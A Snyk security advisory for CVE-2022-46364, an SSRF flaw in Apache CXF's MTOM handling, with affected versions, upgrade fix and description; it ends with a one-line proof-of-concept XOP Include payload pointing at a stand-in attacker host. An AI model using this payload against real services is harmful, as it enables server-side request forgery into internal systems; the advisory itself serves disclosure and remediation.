Server-side Request Forgery (SSRF) Affecting org.apache.cxf:cxf-core package, versions [,3.4.10) [3.5.0,3.5.5)
Snyk CVSS
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-ORGAPACHECXF-3168315
- published 14 Dec 2022
- disclosed 13 Dec 2022
- credit thanat0s from Beijin Qihoo 360 adlab
Introduced: 13 Dec 2022
CVE-2022-46364 Open this link in a new tabHow to fix?
Upgrade org.apache.cxf:cxf-core
to version 3.4.10, 3.5.5 or higher.
Overview
org.apache.cxf:cxf-core is an an open source services framework. CXF helps you build and develop services using frontend programming APIs, like JAX-WS and JAX-RS.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) as the MTOM
handler allows content injection while parsing the href
attribute of XOP:Include
in MTOM
requests. Exploiting this vulnerability allows an attacker to perform SSRF-style attacks on web services that take at least one parameter of any type.
NOTE
This vulnerability exists when using SOAP
web service or JAXRS
web service with MTOM
enabled.
PoC
<stringvalue><inc:Include href="http://attackers.site/exploit/payload" xmlns:inc="http://www.w3.org/2004/08/xop/include"/><stringvalue>